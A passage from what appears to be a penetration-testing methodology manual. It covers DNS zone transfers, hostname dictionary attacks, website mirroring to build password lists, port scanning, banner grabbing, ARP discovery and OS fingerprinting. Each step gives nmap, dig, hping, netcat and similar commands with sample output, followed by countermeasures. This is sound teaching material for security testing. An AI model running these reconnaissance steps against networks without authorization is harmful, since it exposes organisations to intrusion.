whois “NET x.x.x.x”@whois.arin.net
•
whois –h whois.arin.net x.x.x.x
•
whois –h whois.arin.net “NET x.x.x.x”
or
Page 170 of 1123
B.1.23
DNS Interrogation - Perform Zone Transfer on Primary,
Secondary and ISP name server
Description
DNS database provides the information mapping between the IP address and hostnames.
Zone transfer is used to synchronize primary and secondary name servers. Zone transfer
should be allowed between the authorized servers only. External name servers should not
allow leakage of internal information.
Due to load balancing and fault tolerance, there is always more than one name server. The
main name server is called the “primary name server”, and all subsequent name servers
are called “secondary name servers.”
The primary name server and secondary name server both have a domain to IP mapping
for each host in zone file. In following conditions a secondary name server requests a zone
transfer to primary name server:
•
Refresh interval of secondary name server is elapsed
•
DNS service of secondary name server is just restarted
•
Secondary name server is just placed in network
If any one of the above mentioned condition is met, following process will take place:
Step One: The secondary name server requests primary name server for the Start Of
Authority (SOA) record.
Step Two: The primary name server sends back its SOA record to secondary name server.
Step Three: The serial number field in SOA record of primary name server is checked
against secondary name server. If the SOA of primary name server has a higher number
then the secondary server’s zone file is not updated. And a new one will need to be
requested. This is done by AXFR request (“all zone” transfer request).
Step Four: The primary name server receives an AXFR request from a secondary name
server, having all the records for every host in the zone, to the secondary server.
Page 171 of 1123
The Zone file contains following very common Resource Records:
Start of Authority Record (SOA)
It determines version of zone file. Whenever a change occurs in network, let’s say a host is
added/deleted/changed, the primary name server increments serial number in zone file. It
also has the email address of person responsible for primary name server management.
Name Server Record (NS)
It indicates the name server authoritative for the zone.
Address Record (A)
It matches a host name to an IP address.
Pointer Record (PTR)
It maps an IP address to host name.
MX Record (MX)
It specifies a mail exchanger in a DNS domain.
RFC 1034
www.ietf.org
Perform zone transfer on Primary, Secondary and ISP name server. In many cases
organizations don’t take adequately controlled access to their secondary name servers.
Pre-Requisites
Incorrectly configured Domain Name Server
Examples/Results
Zone transfer with nslookup
•
nslookup
•
> server <ipaddresses>
•
> set type=any
•
> ls –d <target.com>
Zone transfer with host
Command:
Page 172 of 1123
•
# host –l –v –t any <target.com>
Prerequisites:
•
Incorrectly configured Domain Name Server
Zone transfer with axfr
Command:
•
axfr <target.com>
•
axfrcat <target.com>
Prerequisites:
•
Incorrectly configured Domain Name Server
•
Recursively transfers zone information
•
Create a compressed database of
o
Zone Information
o
Host file
Zone transfer with dig
•
# dig axfr <domain> @dns-server
Analysis/Conclusion/Observation
Zone transfers allow attackers and assessors to determine the makeup of the network. This
information can be extremely useful to mount several types of network attacks (e.g. packet
injection attacks).
Countermeasures
•
Separate internal and external DNS servers (Split-DNS)
A Split DNS configuration consists of an internal server with the database of all the
DNS names within the organization and an external server that knows only how to
resolve names dealing with the external presence, such as e-mail forwarders and
web servers. This prevents internal network information being accessible to the
external world.
In Windows 2000 environments use active directory integrated DNS servers
internally and an external DNS server separated from Windows domain
Don’t use the external DNS server as forwarder for the internal DNS server. Use the
Page 173 of 1123
provider’s dns servers instead.
•
Restrict zone transfers to a specific list of trusted servers
Configure primary name servers to perform zone transfers to only its secondary or
slave servers. Since zone transfers move all the records for a particular zone from
one server to another it is extremely important not to transfer the forward lookup
zone on a DNS server that contains domain information to any server outside the
domain.
Block 53 TCP on the border firewall(s).
•
Disable dynamic updates on external DNS servers
Latest versions of DNS servers have options for dynamic update of zone database
by integrating with network services including WINS and DHCP. This should be
disabled for external DNS servers and only records required for bare minimum
functionality manually added to the zone database
•
Do not configure HINFO records
Host Information Record (HINFO) is strictly informational and not functional. It is
used to declare the computer type and operating system of a host. This information
can be used to fingerprint a network and is not recommended.
•
Run DNS as a non-root user
Name servers are susceptible to root compromise using buffer overflow attacks
when DNS daemon is run as root. It is safer to run DNS daemon as a non-root user
to minimize damages in case of DNS server compromise
•
Run DNS daemon in a chroot jail
The damage that a successful attacker can inflict can be further limited by running
named in a chroot-ed environment. The Unix chroot system call changes the root
directory of a process, such that the process can then no longer access any of the
files above the specified root directory in the file system hierarchy. All zone files and
configuration files need to be in the chroot directory.
•
Secure the file system/registry
Page 174 of 1123
Secure configuration of ownership and permissions of DNS server’s relevant files is
recommended. For Microsoft Windows environments registry entries also need to
be secured.
•
Disable all unnecessary services on DNS servers
DNS servers should be configured to run minimum services and applications to
reduce chances of compromise due to application weaknesses
•
Update servers with latest security fixes
DNS servers should be regularly patched with the latest security hot fixes and
patches for known vulnerabilities.
•
Enable logging of transactions
Configure logging and monitor logs on a regular basis. Analysis of logs will identify
malicious activities and provide early warning signals.
Links
•
http://wn.wikipedia.org/wiki/AXFR
•
http://www.ietf.org/rfc/2845.txt
•
http://www.ietf.org/rfc/2930.txt
•
http://www.ietf.org/rfc/3008.txt
•
http://www.ietf.org/internet-drafts/draft-ietf-dnsext-axfr-clarify-05.txt
•
http://www.ietf.org/internet-drafts/draft-ietf-dnsext-dnssec-roadmap-06.txt
Tools
•
Dig
•
Nslookup
•
Samspade (both website & windows tool)
•
Whois
Remarks
Many companies configure correctly their DNS, so it is highly probable that DNS zone
transfers will be unsuccessful during an assessment.
Page 175 of 1123
B.1.24
DNS Interrogation - Perform Zone Transfer by dictionary
attack
Description
In cases where organizations have properly controlled access to their DNS servers and
Zone Transfers are refused one can still try to perform dictionary attack against to identify
critical hosts.
These attacks are performed using automated tools/scripts. The tool queries the target
DNS
server
for
‘A’
records
by
matching
host
name
(e.g.
router.target.com,
firewall.target.com, ids.domain.com, etc…), and reports the associated IP address.
The success of this step depends on how much effort you put to customized target
dictionary. Follow dictionary customization process from password security assessment
section.
Examples/Results
Example with dnsdigger.pl tool:
Command:
•
# ./dnsdigger.pl <domain>
Example with dnsenum.pl tool:
Command:
•
# ./dnsenum.pl <domain> <dictionary file>
Command:
Analysis/Conclusion/Observation
Successful DNS interrogation through dictionary attack allows attackers and assessors to
identify network servers and structure. This information is important for some types of
network attacks (e.g. packet injection).
Countermeasures
•
Whenever possible, avoid sing common (easy to guess) names for critical network
servers.
o
A random (or meaningful but cryptic) string of a few characters could be
appended to network names to make guessing more difficult (e.g. ftpsd3.targetorg.com instead of ftp.targetorg.com)
Page 176 of 1123
o
Note that some standards require establish naming conventions and in other
cases it is not convenient to change the name for aesthetic or practical
reasons
(e.g.
www-gt4.target-domain.com
instead
of
www.targetdomain.com), Therefore, there is no point in renaming public
servers. Consider this solution only to servers that have to be publicly
available on the internet that will provide services to only a restricted number
of users or organizations (e.g. web portal for intranet access for remote
users in the organization).
•
Establish authenticated DNS protocols, if possible; restrict zone transfers to only
authorized servers
•
Allow specific zone transfers only with the allow-transfer directive in named.conf
•
Deny all unauthorized inbound connections to TCP port 53
•
Use “notify” option in Microsoft’s DNS
Links
•
http://www.ietf.org/rfc/2845.txt
•
http://www.ietf.org/rfc/2930.txt
•
http://www.ietf.org/rfc/3008.txt
•
http://www.ietf.org/internet-drafts/draft-ietf-dnsext-dnssec-roadmap-06.txt
Tools
•
Dnsdigger
•
Dnsenum
Remarks
The use of appropriate dictionaries is important for the success of this test. Choose names
carefully taking into account:
•
Common network services (e.g. ftp, www, dns, web, email, etc.)
•
The language that might have been used to name the servers, based on location
and public information of the target organization (e.g. location of headquarters)
•
Common acronyms
Page 177 of 1123
B.1.25
DNS INTEROGATION - Finding IPv6 IP blocks in use though
DNS queries
Description
Identify IPv6 blocks within the network of the target organization. Several provisions should
be taken when testing these network blocks.
Examples/Results
Perform normal DNS interrogation procedures.
Example with dig, reporting IPv6 addresses with type AAAA:
# dig @ns.targetprovider.net targetdomain.com –t ANY
; Authoritative data for targetdomain.com @
IN
SOA ns.ipv6.targetprovider.net …
…
targetservX
IN
A
XXX.XXX.XXX.XXX
targetservX
IN
AAAA
XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX:XXXX
…
Analysis/Conclusion/Observation
Successful DNS interrogation through DNS queries allows attackers and assessors to
identify network servers and structure. This information is important for some types of
network attacks (e.g. packet injection).
Countermeasures
•
Restrict zone transfers to only authorized servers
•
Allow specific zone transfers only with the allow-transfer directive in named.conf
•
Deny all unauthorized inbound connections to TCP port 53
•
Use “notify” option in Microsoft’s DNS
http://support.microsoft.com/support/kb/articles/q193/8/37.asp
•
External name servers should not allow leakage of internal information
•
Limit use of HINFO records
Links
•
http://en.wikipedia.org/wiki/AAAA_record#IPv6_and_the_Domain_Name_System
•
http://www.ietf.org/rfc/rfc3363.txt
•
http://www.ietf.org/rfc/rfc3364.txt
Tools
Page 178 of 1123
•
dig
Remarks
Page 179 of 1123
B.1.26
Mirror Target Web Site
Description
It is wise to use offline browser such as HTTrack or preferably Wget to completely mirror all
target websites (including any personal websites located).
Process
ƒ
Grab the target website offline
ƒ
Understand the Web implementation logic and chart out the logical Web-tree
ƒ
Note down the webserver(s) and server banners, and version information
ƒ
Search the local Web-tree for all e-mail addresses and other useful information,
particularly the pages in the job posting sub-branch
ƒ
Check for repetitive words in the Web-tree; one can build a user/password list from this
information
ƒ
Use tools which can build effective dictionaries from Web pages (words commonly
used on the website are likely passwords in the organization)
Analysis/Conclusion/Observation
Both an attacker and an assessor will review the information gathered through this
technique. Review the source code of all pages for the following (refer: web application
section):
•
Comments (e.g. username and password)
•
Database connectivity
•
Meta tags
•
Confidential information
•
Hidden fields
•
Search for keywords (e.g. "pass", "password", “server”, “database”, “login”)
•
Web programming patterns (i.e. errors and vulnerabilities could repeat in several
pages)
Countermeasures
To avoid critical information leaks, organizations should ensure that:
•
Comments in production web pages and applications do not include sensitive
information
•
Confidential information should be separated in different repositories from public
Page 180 of 1123
information. Access to this information should be restricted and controlled (e.g.
single access path with authentication controls in place)
•
Appropriate session management controls should be implemented in corresponding
web pages and applications, in order to avoid access to restricted information by
non-authorized users, or by users that have not started a session properly.
Links
•
http://www.httrack.com/page/2/en/index.html
•
http://www.gnu.org/software/wget/wget.html
Tools
•
HTTrack wget for Windows and Unix
•
GNU wget
Remarks
Web mirroring is very consuming in terms of time and resources. The depth of the mirroring
process and starting web pages should be carefully selected.
Page 181 of 1123
B.1.27
Global Countermeasures
Countermeasures
Along with information gained from the above steps, a security assessor could suggest the
following countermeasures to safeguard the target against such attacks:
•
Limit giving public information
•
Release organizational information only on a need-to-know basis
o
Do not give information on your network architecture to the media
o
Do not give configuration details on Public Domain
o
Limit the use of names in e-mail addresses (ex. Sales@target.com rather
than j0hnny@target.com)
•
Whois Information
o
Do not give technical person name on whois database
o
Do not give telephone numbers belonging to your company’s telephone
range
o
Use “Generic” names such as “hostmaster” and/or “postmaster”
o
Use a unique phone number (e.g. located into server room … if an external
call comes onto that phone …)
•
•
DNS information
o
Restrict the use of hinfo records
o
Use notify option of Microsoft DNS
o
Restrict zone transfers to authorized parties
Use non-associated e-mails for whois database (or use “generic” emails such as
postmaster@<company>.com
•
Use PGP for changing whois information
•
Restrict DNS Zone Transfer (from the internet)
o
Allow zone transfer on server only to authorized domains and/or only to
second-level dns servers (backup dns servers)
o
Allow TCP Port 53 on firewall only to authorized domains and/or only to
second-level dns servers (backup dns servers)
o
Use split horizon DNS (separate zones internally and externally) – it ensures
that internal hostnames aren’t referenced to IP addresses within the DNS
Page 182 of 1123
zone file of public DNS
o
•
Make sure HINFO and other records don't come into view in DNS zone files.
Email System
o
SMTP servers must be configured to
ƒ
ignore email message addressed to unknown recipients
ƒ
send responses in such a way such that it doesn’t include email relay
host information or internal IP addressing scheme.
ƒ
E.g. of email relay servers are MS Exchange, Qmail, Sendmail etc..
ƒ
Remove information from the email headers (on the email relay
server)
•
•
Search Engine
o
Disable directory listing in Web Server
o
Never put sensitive information online on publicly accessible servers
Social Engineering
o
Its recommended to use centralized network administration contact to
safeguard against social engineering
Links
Suggested reading to hone your skills in this domain are:
General Information
•
http://neworder.box.sk/newsread.php?newsid=6575
•
http://bit.csc.lsu.edu/~yixin/frame.dir/main.dir/course.dir/infoGathering.html
Big Brother System and Network Monitor
•
http://bb4.com
Watching the Watchers II-2 by j0hnny
•
http://johnny.ihackstuff.com/security/premium/04-01-2003Watching_the_Watchers_II-2.ppt
Tools
•
Several network vulnerability scanners
Remarks
Page 183 of 1123
Page 184 of 1123
B.2 NETWORK MAPPING
ENUMERATION)
(SCANNING,
OS
FINGERPRINTING
AND
Description
Following the first section when all possible information about the target has been
acquired, a more technical approach is taken to ‘footprint’ the network and resources in
question. Network specific information from the previous section is taken and expanded
upon to produce a probable network topology for the target. Many tools and applications
can be used during this stage to aid the discovery of technical information about the
hosts and networks involved in the test.
Aim/Objective
During the initial stage the aim was to gain general knowledge and information about the
organization involved, this section focuses on the technical aspects. During network
mapping and enumeration you are attempting to identify all live hosts, operating systems
involved, firewalls, intrusion detection systems, servers/services, perimeter devices,
routing and general network topology (physical layout of network), that are part of the
target organization. This allows us to move to the next stage and identify any actual
vulnerabilities. During this section you are aiming to find out what the network contains
(hosts/servers/routers
and
other
devices)
and
how
it
works
(using
what
protocols/operating systems). You should look to gain every piece of information you can
including e-mail addresses, NetBIOS names, NFS exports, hostnames, WHOIS
information, externally accessible services etc. This is by far the most important stage in
the penetration testing process. Failing to have a “good” network map can result in false
positives on the aspect of vulnerabilities.
Page 185 of 1123
B.2.1 Identify Live Hosts
Description
Finding live hosts is the first step (or one of the first steps) in network mapping. This step
can severely narrow down the amount of systems that should be tested/investigated. Most
default ping commands are using icmp as the underlying protocol, some tools can also
send TCP packets to find out if a remote host is active or not (very useful if the remote
network is blocking icmp…)
Examples/Results
Using ping
Using nmap (icmp): nmap –sP –vv <target>
# nmap -v -sP 10.3.8.1-50
Starting nmap V. 3.81 (www.insecure.org/nmap/)
Host (10.3.8.1) appears to be down.
Host (10.3.8.2) appears to be down.
Host (10.3.8.3) appears to be down.
Host (10.3.8.4) appears to be down.
Host (10.3.8.5) appears to be up.
Using nmap –sP with –PE, -PA or –PS switches should yield better results.
Using nmap (tcp): nmap –sP –vv –PS80 <target>
# nmap -sP –vv –PS80 10.3.8.1-50
Starting nmap V. 3.81 (www.insecure.org/nmap/)
Host (10.3.8.1) appears to be down.
Host (10.3.8.2) appears to be down.
Host (10.3.8.3) appears to be down.
Host (10.3.8.4) appears to be down.
Host (10.3.8.5) appears to be up.
Using hping (tcp examples): hping –S –c 2 <target>
[root@localhost root]# hping -S -c 2 10.3.8.5
HPING 10.3.8.5 (eth1 10.3.8.5): S set, 40 headers + 0 data bytes
Page 186 of 1123
len=46 ip=10.3.8.5 ttl=60 id=1650 sport=0 flags=RA seq=0 win=0 rtt=2.8 ms
len=46 ip=10.3.8.5 ttl=60 id=1651 sport=0 flags=RA seq=1 win=0 rtt=2.4 ms
[root@localhost root]# hping -S -c 2 10.3.8.1
HPING 10.3.8.1 (eth1 10.3.8.1): S set, 40 headers + 0 data bytes
ICMP Host Unreachable from ip=10.3.8.64 name=UNKNOWN
ICMP Host Unreachable from ip=10.3.8.64 name=UNKNOWN
Analysis/Conclusion/Observation
Normally, a list of live hosts should be created using this step.
•
Nmap examples: Here the first four hosts are either down or icmp is blocked and
the fifth host is up and replying to ping requests.
•
Hping examples: Example 1 shows ICMP host unreachable error and that indicates
that the host is down while in example we are getting Reset/Ack flag back hence
the host is up.
A list of live host means that these are visible from the assessor’s testing location. Hosts
reported dead are actually not alive or traffic to them is being filtered.
Countermeasures
Links
•
http://www.insecure.org
•
http://www.hping.org
Tools
•
Hping
•
Fping
•
Unix ping
•
Windows ping
•
Nmap
•
traceroute
•
tcptraceroute
Gopher testing: Ping statistics (eg. Packet TTL)
Remarks
Page 187 of 1123
•
As you start live host detection, you should also run a passive fingerprinting tool in
the background, it will help you to identify operating systems simultaneously.
•
If nothing is found using this step, this probably means either one of the following
and you should investigate further:
•
o
the target network is not reachable
o
the target network is protected by a properly configured firewall
o
the target system is not reachable
Using different techniques to identify live hosts will increase the probability of
success (TCP scanning is particularly effective against firewalls and network filters)
B.2.2 Determine running Services
Finding running services can be done with port scanning. At the same time of finding
these services, version information should be gathered as well and also the operating
system guessing can be performed by seeing running services at the same time.
B.2.2.1 FIND OPEN PORTS
B.2.2.1.1 TCP PORT SCANNING
Description
TCP Port scanning will give you all listening, closed or filtered TCP ports on a certain
target. TCP Port scanning can be performed by either performing a full tcp 3-way
handshake (tcp connect scans) or by performing a syn-scan (stealth scanning or half
scanning).
The following example will scan the target and list all the open services running on it. It is
using the Half Open Scan feature of Nmap (aka Stealth Scan).
Examples/Results
Using nmap with SYN stealth scanning and verbose output:
# nmap -sS 10.3.8.5 -vv
Starting nmap V. 3.81 ( www.insecure.org/nmap/ )
Host (10.3.8.5) appears to be up ... good.
Initiating SYN Stealth Scan against (10.3.8.5)
Page 188 of 1123
Adding open port 280/tcp
Adding open port 515/tcp
Adding open port 631/tcp
Adding open port 80/tcp
Adding open port 9100/tcp
Adding open port 21/tcp
Adding open port 23/tcp
The SYN Stealth Scan took 16 seconds to scan 1601 ports.
Interesting ports on (10.3.8.5):
(The 1594 ports scanned but not shown below are in state: closed)
Port
State
Service
21/tcp
open
ftp
23/tcp
open
telnet
80/tcp
open
http
280/tcp
open
http-mgmt
515/tcp
open
printer
631/tcp
open
ipp
9100/tcp open
jetdirect
Using nmap with complete scan and no ping:
# nmap -sT -P0 192.168.1.254
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-06-05 10:42 CDT
Interesting ports on gateway (192.168.1.254):
(The 1662 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
80/tcp open http
Using Hping to create custom SYN+FIN scan (not supported by nmap), note how
port 22 responds on a Linux system:
# hping -SF 192.168.0.254 -p ++20 -c 10
HPING 192.168.0.254 (eth0 192.168.0.254): SF set, 40 headers + 0 data bytes
len=46 ip=192.168.0.254 ttl=242 DF id=14 sport=20 flags=RA seq=0 win=0 rtt=5.0 ms
len=46 ip=192.168.0.254 ttl=242 DF id=15 sport=21 flags=RA seq=1 win=0 rtt=5.4 ms
Page 189 of 1123
len=46 ip=192.168.0.254 ttl=242 DF id=0 sport=22 flags=SA seq=2 win=5840 rtt=3.5 ms
len=46 ip=192.168.0.254 ttl=242 DF id=16 sport=23 flags=RA seq=3 win=0 rtt=4.0 ms
len=46 ip=192.168.0.254 ttl=242 DF id=17 sport=24 flags=RA seq=4 win=0 rtt=3.5 ms
len=46 ip=192.168.0.254 ttl=242 DF id=18 sport=25 flags=RA seq=5 win=0 rtt=3.5 ms
len=46 ip=192.168.0.254 ttl=242 DF id=19 sport=26 flags=RA seq=6 win=0 rtt=4.1 ms
len=46 ip=192.168.0.254 ttl=242 DF id=20 sport=27 flags=RA seq=7 win=0 rtt=3.4 ms
len=46 ip=192.168.0.254 ttl=242 DF id=21 sport=28 flags=RA seq=8 win=0 rtt=4.1 ms
len=46 ip=192.168.0.254 ttl=242 DF id=22 sport=29 flags=RA seq=9 win=0 rtt=3.5 ms
Analysis/Conclusion/Observation
A list of open closed or filtered ports. Services shown by port scanners can be probed for
vulnerabilities.
Countermeasures
Implement properly configured firewalls, only allowing through what is absolutely needed.
Also, restrict source addresses in firewalls if a certain service should not be accessible to
anyone (e.g. restrict administration services on routers so that only workstations from
administrators have access).
Links
•
http://www.ouah.org/portscandethly.pdf
•
http://www.sys-security.com/archive/papers/Network_Scanning_Techniques.pdf
Tools
•
Nmap
•
Netcat
•
Hping
•
Fscan
•
Other port scanning tools
Remarks
Never rely on a single result of a port scanning tool, perform the port scan twice or more
with two or more different tools. Test different TCP scanning techniques (e.g. ack, fin, syn,
idle, complete scans). Complete scans (i.e. complete 3 way handshake) will yield the least
number of false positives, but other scan types have better chances of evading security
controls.
Page 190 of 1123
Stealth scanning techniques will provide different results accuracy, depending on the type
of the system being scanned (i.e. responses from Solaris, Windows and Linux will be
different).
Page 191 of 1123
B.2.2.1.2 UDP PORT SCANNING
Description
UDP Port scanning will give you all listening, closed or filtered UDP ports on a certain
target. UDP Port scanning is performed by sending a raw UDP frame to the target and
watching the replies to this UDP frame.
The following example will scan the target and list all the open udp services running on it.
Examples/Results
[root@localhost root]# nmap -sU 10.3.8.5 -vv
Starting nmap V. 3.81 ( www.insecure.org/nmap/ )
Host (10.3.8.5) appears to be up ... good.
Initiating UDP Scan against (10.3.8.5)
The UDP Scan took 12 seconds to scan 1468 ports.
Adding open port 161/udp
Adding open port 427/udp
Interesting ports on (10.3.8.5):
(The 1466 ports scanned but not shown below are in state: closed)
Port
State
Service
161/udp
open
snmp
427/udp
open
svrloc
Nmap run completed -- 1 IP address (1 host up) scanned in 12 seconds
Analysis/Conclusion/Observation
A list of Open, Closed or filtered UDP ports.
Countermeasures
Implement properly configured firewalls, only allowing through what is absolutely needed.
Also, restrict source addresses in firewalls if a certain service should not be accessible to
anyone (e.g. restrict administration services on routers so that only workstations from
administrators have access).
Links
Page 192 of 1123
Tools
•
Nmap
•
Netcat
•
Hping
•
Udp_scan
Remarks
Never rely on a single result of a port scanning tool, perform the port scan twice or more
with two or more tools.
Due to the nature of UDP protocol, UDP port scans show false positives frequently. Take
into account that:
•
Sending an UDP packet to an open port will receive no answer from a server.
•
Only closed ports will reply with an ICMP error message. Therefore, closed ports
behind firewalls that egress filter these ICMP error messages might be reported as
open by the port scanner (if you see hundreds, thousands of ports reported as
open, this might be the case).
Page 193 of 1123
B.2.2.1.3 BANNER GRABBING
Description
Banner grabbing is also known as service fingerprinting. With this technique, an attacker
looks at the headers or banners of open ports to see what service is running behind that
open port. This banner grabbing can be performed manually (with nc or telnet) or semiautomatically (with nmap, amap or other banner grabbing tool).
Basic banner grabbing (or version detection) can be performed with nmap as well. The
option to use then with nmap is “-sV”. This option has to be used together with a port scan
option (like “-sS” or “-sT”).
Examples/Results
[root@localhost root]# nc -vv www.target.com 80
Warning: inverse host lookup failed for 192.168.0.1: Unknown host
www.target.com [192.168.0.1] 80 (http) open
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Sun, 12 Oct 2003 13:36:46 GMT
Server: Apache/1.3.26 (Unix) mod_jk mod_perl/1.27 mod_perl/1.27
Last-Modified: Mon, 06 Oct 2003 08:13:35 GMT
ETag: "1f881e-7a95-3f81242f"
Accept-Ranges: bytes
Content-Length: 31381
Connection: close
Content-Type: text/html
sent 18, rcvd 286
[root@localhost root]# nmap –sS –sV 10.0.0.1
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-05-29 20:03 CDT
Interesting ports on localhost (10.0.0.1):
(The 1662 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
Page 194 of 1123
22/tcp open ssh
OpenSSH 3.9p1 (protocol 2.0)
[root@localhost root]# amap –v 10.0.0.1 22
amap v4.8 (www.thc.org/thc-amap) started at 2005-05-29 20:58:53 - MAPPING mode
Total amount of tasks to perform in plain connect mode: 17
Waiting for timeout on 17 connections ...
Protocol on 10.0.0.1:22/tcp (by trigger http) matches ssh
Protocol on 10.0.0.1:22/tcp (by trigger http) matches ssh-openssh
Unidentified ports: none.
Analysis/Conclusion/Observation
Banner grabbing will give you a list of all open ports with the associated services running
behind these open ports. This could also tell you what operating system is in use on the
target system.
Countermeasures
Changing version numbers and product names in service banners will make it more difficult
for an attacker to identify correctly a system. However, it should be noted that this solution
is not bullet-proof and doesn’t make systems more secure.
Links
•
http://www.liquidinfo.net/papers/nc_usage.html
•
http://www.hackinthebox.org/article.php?sid=7947
Tools
•
Grabbb
•
Languard
•
Nmap
•
Amap
•
Netcat
•
telnet
Remarks
The automatic banner grabbing tool don’t display all interesting information, manual banner
grabbing should always be performed as well!!!
Page 195 of 1123
Page 196 of 1123
B.2.2.2 ARP DISCOVERY
Description
Using arp requests, one can found out what system are active on the local subnet without
having an ip address on that local subnet.
To perform this, the attacker sends out ARP request packets (“who has ip address
x.x.x.x?”). If the system with ip address x.x.x.x is active, it will answer with an ARP reply
packet (“I have x.x.x.x, my mac address is AA:BB:CC:DD:EE:FF”)
Examples/Results
# arping 10.0.0.1
ARPING 10.0.0.1 from 10.0.0.100 eth0
Unicast reply from 10.0.0.1 [DE:30:3A:CA:D4:44] 1.584ms
Unicast reply from 10.0.0.1 [DE:30:3A:CA:D4:44] 0.863ms
Unicast reply from 10.0.0.1 [DE:30:3A:CA:D4:44] 0.863ms
Analysis/Conclusion/Observation
Once an attacker or assessor has gained access to a LAN, ARP discovery will give them
the MAC address of the system. Several hijacking attacks and denial of service can take
place under this situation.
Countermeasures
The use of switched LANs along with port locking and VLANs will limit the ability to perform
arp pings, as well as the attacks that could be performed if this capability is available.
Consider the use of port locking on switches and VLANs at leas for critical production
systems.
Links
•
http://www.ietf.org/rfc/rfc894.txt
•
http://www.ietf.org/rfc/rfc826.txt
Tools
•
Arping
•
Arpwatch
•
Arp + protocol analyzer
Remarks
This only works on the local LAN where you are connected to.
Page 197 of 1123
B.2.2.2.1 VERIFY RUNNING SERVICES BY ESTABLISHIG FALSE COMMUNICATION
Tools
Amap, nessus
Page 198 of 1123
B.2.3 Identify Perimeter Network (Router / Firewalls)
B.2.3.1 IDENTIFY PERIMETER NETWORK – TRACEROUTING
Description
Traceroute will tell you several things about a network. These several things are:
•
the path to that network
•
intermediate routers and/or devices
•
potential information about filtering devices
•
potential information about allowed protocols
Examples/Results
Using ICMP (default on windows)
•
C:\> tracert <target>
•
# traceroute –I <target>
Using UDP (default on Linux, not standard on windows)
•
# traceroute <target>
Using TCP
•
# tcptraceroute <target>
Note: Disabling DNS lookups while performing trace routes will result in a faster response!
Analysis/Conclusion/Observation
Analyze the reply traffic for ICMP error messages:
• Identify Router and Firewall using ICMP Admin Prohibited Packets.
•
ICMP Admin Prohibited packet = ICMP type 3 message with code 13
Countermeasures
•
Block ICMP echo requests at the firewall or external router
•
Block UDP packets at the firewall
•
Egress filter ICMP TTL Exceeded and destination unreachable packets
•
Allow traffic in through the firewall only to specific hosts
Links
•
http://www.ietf.org/rfc/rfc0792.txt
Tools
Page 199 of 1123
•
Traceroute, tcptraceroute, xtraceroute (Linux)
•
Tracert (Windows)
•
http://www.traceroute.org
•
www.tracert.com/cgi-bin/trace.pl
Remarks
Routes between hosts are not static; they may change due to routing protocols. Also, there
might be more than one perimeter router on the target network (e.g. redundant connection
with different ISP). Therefore, it is important to make several tests, from different locations
and ISPs.
Page 200 of 1123
B.2.3.2 IDENTIFY PERIMETER NETWORK – USING ADMIN PROHIBITED PACKETS
ICMP Admin Prohibited packet = ICMP type 3 message with code 13
B.2.3.3 SCAN DEFAULT FIREWALL/ROUTER PORTS
Description
Search for ports used for administrative access and for ports that are useful to identify a
certain brand of firewall.
Search for banners that identify the brand and version of firewall being used.
Process
•
Perform Port Scanning (SYN, ACK, FIN, XMAS, UDP, NULL) and OS guessing with
port scanner or manual scanning procedures.
•
Using common server ports (e.g. 53, 80. 443) as source ports will yield better
results against stateless firewalls.
Analysis/Conclusion/Observation
Firewall administration ports, even if they use strong authentication algorithms, should
never be available from outside the corporate network. Ports that identify the brand/version
of a firewall should be filtered and banners (e.g. from application proxies) should be
changed if possible to make firewall fingerprinting more difficult.
Being able to access and administration port or just being able to identify the firewall brand
and version doesn’t mean it is vulnerable. However, we are talking about the most widely
used, effective, and sometimes the only type of defense used in networks the impact of a
glitch in this kind of security controls is so big, that even these simple recommendations
should be taken seriously, in this case.
Countermeasures
•
Filter all administration ports
•
Change banners that allow identification
•
Use separate network or vlan for administration
Links
•
http://www.spitzner.net/audit.html
•
http://www.cert.org/security-improvement/practices/p060.html
Tools
Page 201 of 1123
•
Netcat
•
hping
•
nmap
Remarks
See the firewall ports document for all default ports used by most firewall systems.
The Firewall Assessment Section contains detailed information for testing this kind of
security controls.
Page 202 of 1123
B.2.3.4 PERFORM FIN/ACK SCAN
Description
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Links
Tools
•
nmap
Remarks
Page 203 of 1123
B.2.3.5 MAP ROUTER / FIREWALL RULE-BASE
Description
Analyze the information gained in Banner Grabbing and port scanning tests, and map
router and firewall rule-base. Use specialized tools for network mapping to map the
network behind the firewall.
Process
Map firewall and router rules using the following guidelines:
•
For each open service found, create document an accept rule
•
For each rule, try to map their restrictions (e.g. IP address restrictions)
•
Also, using banners, try to identify and document if open services are behind
proxies or not (e.g. conflicting reports for O.S. and application identification usually
mean proxied services)
Analysis/Conclusion/Observation
Firewall rule mapping with give both attackers and assessors and insight on network
structure to tune future tests. This kind of information might include, for example:
•
Network map
•
Number and kind of services available
o
Indicate the permeability of the network
o
Indicate the complexity of the network
o
Indicate the core business network services
Countermeasures
In order to restrict the risks involved in network mapping, an organization should:
•
Enable access only to those network services that are needed by business
•
Avoid the use of exceptions that would reflect in firewalls and router rules
(increasing complexity in the administration of these devices)
•
Avoid the use of negative logic filtering rules (i.e. rules that specifically block illegal
access while implicitly permitting everything else)
Links
•
http://www.packetfactory.net/projects/firewalk/firewalk-final.pdf
Tools
Page 204 of 1123
•
Firewalk
•
Ftester
•
Netcat
•
Nmap
•
Amap
Remarks
Network mapping is a complex and time consuming time. Allow changes and adjustments
for the results to take place, even after you have finished this test, by using feedback from
subsequent test.
B.2.4 Countermeasure
B.2.5 Further reading
http://www.networkintrusion.co.uk/enum.htm
http://tinyurl.com/o5he
B.2.6 Tools
Nmap
Pinger
Fping
NetCat
SuperScan
B.2.7 Operating System Fingerprinting
B.2.7.1 PASSIVE OS GUESSING
Description
By sniffing and comparing the Time To Live and Window Sizes, one can identify the remote
operating system in use.
This can be easily accomplished by using p0f or by putting a protocol analyzer to listen to
traffic, and then doing manual analysis of the traffic that is captured.
Process
Setup a sniffer or a passive fingerprinting tool (e,g, p0f) into listening mode. You will be
able to collect information on O.S. brands on the local network directly (unless you are in a
Page 205 of 1123
switched environment).
Also, you will be able to collect information from all machines or servers establishing a
connection to your equipment or with those machines that you try to connect to.
If doing manual fingerprint, you will have to analyze manually the network packets
captured, in order to identify the system, using several techniques (e.g. initial ttl in header,
window size in header, response to overlapped packets, etc.).
Examples/Results
Using p0f for scanning incoming connections:
# p0f
p0f - passive os fingerprinting utility, version 2.0.5
